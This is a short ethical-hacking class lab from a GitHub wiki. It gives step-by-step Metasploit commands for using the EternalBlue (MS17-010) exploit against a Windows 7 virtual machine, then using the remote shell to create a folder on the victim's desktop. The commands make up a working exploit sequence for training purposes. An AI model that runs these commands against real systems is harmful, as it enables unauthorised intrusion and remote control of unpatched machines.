Class 6 Lab 4 ‐ EternalBlue - Justin-Boyd/Ethical-Hacking-Class GitHub Wiki
Task: EternalBlue
Step 1
- Turn on the pfSense, Kali, and Windows 7 virtual machines.
Step 2
- Make sure that the firewall is off in the Windows 7 machine.
Step 3
- In the Kali machine, locate the EternalBlue module in MetaSploit (introduced in EH-06) and use it to exploit the Windows 7 machine.
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [Windows 7 IP]
set LHOST [Kali IP]
show options
exploit
Step 4
- When you have a remote shell, navigate to the desktop and create a directory called “Hacked!”
cd C:\Users
dir
cd john\desktop
mkdir Hacked!
dir